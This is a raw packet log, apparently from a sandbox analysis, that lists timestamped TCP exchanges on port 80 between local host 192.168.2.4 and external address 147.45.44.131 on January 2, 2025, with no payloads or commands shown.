Jan 2, 2025 19:13:05.133596897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133601904 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133613110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133625984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133626938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133637905 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133639097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133650064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133657932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133670092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133687019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133692980 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133697987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133713007 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133723974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133733034 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133740902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133754015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133757114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133764029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133774996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133788109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133814096 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133847952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133857965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133873940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133884907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133889914 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133900881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133913040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133917093 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133923054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133933067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133945942 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133968115 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.133981943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133991957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.133996964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134025097 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134036064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134046078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134061098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134071112 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134073019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134084940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134093046 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134097099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134115934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134116888 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134130955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134141922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134150028 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134159088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134171009 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134174109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134181976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134191990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134203911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134210110 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134232998 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134298086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134313107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134325027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134330034 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134334087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134349108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134361029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134361982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134371042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134382963 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134388924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134397984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134406090 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134408951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134421110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134428024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134430885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134443045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134450912 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134454012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134471893 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134474039 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134483099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134494066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134505033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134510994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134514093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134522915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134526014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134536982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134546995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134576082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134605885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134615898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134625912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134639978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134651899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134655952 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134661913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134673119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134680033 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134684086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134695053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134701967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134713888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134715080 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134725094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134732962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134743929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134756088 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134756088 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134768009 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134768009 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134778976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134788990 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134789944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134800911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134809017 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134810925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134828091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134835005 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134840012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134848118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134859085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134864092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134871006 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134879112 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134881973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134900093 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134922028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134932041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134942055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134953976 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.134953976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.134977102 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.135015011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135023117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135031939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135040998 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.135044098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135056019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135060072 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.135066986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135076046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135087967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135087967 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.135097027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135118008 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.135138035 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.135885954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135904074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135911942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135952950 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.135984898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.135994911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136003971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136013985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136022091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136033058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136038065 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136042118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136053085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136059999 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136063099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136080027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136085033 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136090040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136095047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136104107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136118889 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136121035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136132956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136141062 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136142969 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136152983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136159897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136171103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136178970 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136181116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136192083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136203051 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136209965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136224031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136226892 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136234999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136245012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.136261940 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.136281013 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220268965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220288038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220298052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220307112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220316887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220324993 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220334053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220376968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220442057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220452070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220463037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220467091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220467091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220473051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220482111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220489025 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220491886 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220501900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220513105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220518112 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220529079 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220535994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220546007 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220561981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220571041 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220572948 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220582962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220591068 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220592976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220611095 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220664024 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220674038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220684052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220695019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220700026 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220709085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220712900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220725060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220733881 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220736027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220743895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220752954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220779896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220782042 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220791101 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220793962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220801115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220810890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220822096 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220823050 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220832109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220841885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220848083 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220851898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220860004 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220864058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220871925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220881939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220890045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220896006 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220900059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220911026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220921040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220927000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220936060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220944881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220952988 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220976114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.220978975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220985889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220993042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.220999002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221008062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221013069 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221024036 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221035957 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221091986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221106052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221115112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221122026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221132994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221136093 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221143961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221149921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221153975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221163988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221174955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221198082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221236944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221246004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221256018 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221262932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221276999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221278906 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221295118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221296072 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221303940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221313000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221323013 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221326113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221339941 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221342087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221349955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221354961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221362114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221375942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221385956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221390009 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221402884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221409082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221421957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221432924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221436977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221442938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221451998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221462011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221467972 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221471071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221481085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221484900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221491098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221501112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221508026 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221510887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221522093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221528053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221534014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221549034 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221560001 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221602917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221672058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221678972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221687078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221699953 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221703053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221713066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221720934 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221740961 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221765041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221774101 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221782923 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221790075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221800089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221817017 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221817970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221827984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221836090 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221838951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221848965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221849918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221860886 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.221868992 CET	80	49731	147.45.44.131	192.168.2.4
